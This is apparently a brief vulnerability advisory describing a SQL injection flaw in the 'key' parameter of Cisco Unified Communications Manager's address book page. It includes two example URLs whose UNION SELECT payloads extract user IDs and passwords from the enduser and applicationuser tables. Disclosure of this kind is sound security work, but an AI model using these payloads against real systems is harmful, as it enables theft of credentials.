|
Cisco Unified Communications Manager 'key' Parameter SQL Injection Vulnerability
An attacker can exploit this issue via a browser. The following examples are available: https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+ SELECT+'','',firstname,lastname,userid,password+from+enduser;-- https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+ SELECT+'','','',user,'',password+from+applicationuser;-- |
|
|
Privacy Statement |
